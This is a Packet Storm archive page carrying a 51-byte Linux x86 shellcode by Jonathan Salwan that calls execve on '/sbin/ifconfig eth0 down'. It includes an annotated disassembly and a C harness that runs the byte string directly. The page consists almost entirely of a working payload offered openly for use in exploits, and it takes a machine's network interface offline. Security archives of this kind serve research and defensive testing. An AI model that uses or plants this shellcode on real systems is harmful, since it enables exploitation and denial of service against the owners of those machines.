exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux x86 ifconfig eth0 down Shellcode

Linux x86 ifconfig eth0 down Shellcode
Posted Jan 21, 2009
Authored by Jonathan Salwan | Site shell-storm.org

51 bytes small Linux x86 ifconfig eth0 down shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | a3473af2855a6c5ff9b7cd927a90afb55b0129f55cf72105ca38eca1e8b41fab

Linux x86 ifconfig eth0 down Shellcode

Change Mirror Download
/*  Linux x86 - ifconfig eth0 down - 51 bytes
* Jonathan Salwan <js.rac.projet[*AT]gmail.com>
* Web: http://racprojet.zapto.org
*
*
*
* Disassembly of section .text:
*
* 08048060 <_start>:
* 8048060: 6a 0b push $0xb
* 8048062: 58 pop %eax
* 8048063: 99 cltd
* 8048064: 52 push %edx
* 8048065: 68 64 6f 77 6e push $0x6e776f64
* 804806a: 89 e6 mov %esp,%esi
* 804806c: 52 push %edx
* 804806d: 68 65 74 68 30 push $0x30687465
* 8048072: 89 e1 mov %esp,%ecx
* 8048074: 52 push %edx
* 8048075: 68 6e 66 69 67 push $0x6769666e
* 804807a: 68 69 66 63 6f push $0x6f636669
* 804807f: 68 69 6e 2f 2f push $0x2f2f6e69
* 8048084: 68 2f 2f 73 62 push $0x62732f2f
* 8048089: 89 e3 mov %esp,%ebx
* 804808b: 52 push %edx
* 804808c: 56 push %esi
* 804808d: 51 push %ecx
* 804808e: 53 push %ebx
* 804808f: 89 e1 mov %esp,%ecx
* 8048091: cd 80 int $0x80
*
*/

main()
{
char shellcode[] =
"\x6a\x0b"
"\x58"
"\x99"
"\x52"
"\x68\x64\x6f\x77\x6e"
"\x89\xe6"
"\x52"
"\x68\x65\x74\x68\x30"
"\x89\xe1"
"\x52"
"\x68\x6e\x66\x69\x67"
"\x68\x69\x66\x63\x6f"
"\x68\x69\x6e\x2f\x2f"
"\x68\x2f\x2f\x73\x62"
"\x89\xe3"
"\x52"
"\x56"
"\x51"
"\x53"
"\x89\xe1"
"\xcd\x80";

printf("Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close